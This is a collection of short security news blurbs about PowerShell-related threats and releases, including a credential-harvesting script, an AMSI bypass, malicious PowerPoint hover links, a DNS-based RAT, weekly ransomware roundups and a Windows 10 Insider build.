A new PowerShell script was posted on Github recently that prompts a victim to enter their login credentials, checks if they are correct, and then sends the credentials to a remote server. This allows an attacker to distribute the script and harvest domain login credentials from their victims.
Malware that embeds a null character in its code can bypass security scans performed by the Anti-Malware Scan Interface (AMSI) on Windows 10 boxes.
Security researchers have spotted a booby-trapped PowerPoint file that will download malware to a computer whenever a victim hovers a link, no macro scripts required.
Malware researchers have come across a new Remote Access Trojan (RAT) that uses a novel technique to evade detection on corporate networks by fetching malicious PowerShell commands stored inside a domain's DNS TXT records.
Lots of small ransomware infections / screenlockers this week, but no major infections were discovered. Thankfully, security researchers were able to create a bunch of decryptors and make them available for victim's to recover their files. Of particular note was the San Francisco MTA getting hit hard by the HDDCryptor ransomware.
Microsoft researchers Itai Grady and Tal Be'ery released today a new tool designed to help system administrators protect enterprise networks from reconnaissance attacks.
Today Microsoft has released the Windows 10 Insider Preview Build 14971 for PC to Insiders on the fast ring. This release adds the ability to read EPUB book in Microsoft Edge, includes the Paint 3D application, and makes the PowerShell the default shell from file explorer and the Win+X Menu.
This week we have 3 new ransomware variants, 2 new ransomware infections, and 4 new ransomware decryptors. Stampado finally popped its head out of its hole, but was quickly squashed and a slew of new decryptors were released. Overall, a good week for the good guys.
It is bad enough when a ransomware infection encrypts your data and demands a ransom, but it's even worse when shoddy programming destroys it instead. This is what happened in a new variant of the Power Worm ransomware where bad programming encrypts your data using AES encryption and then throws away the key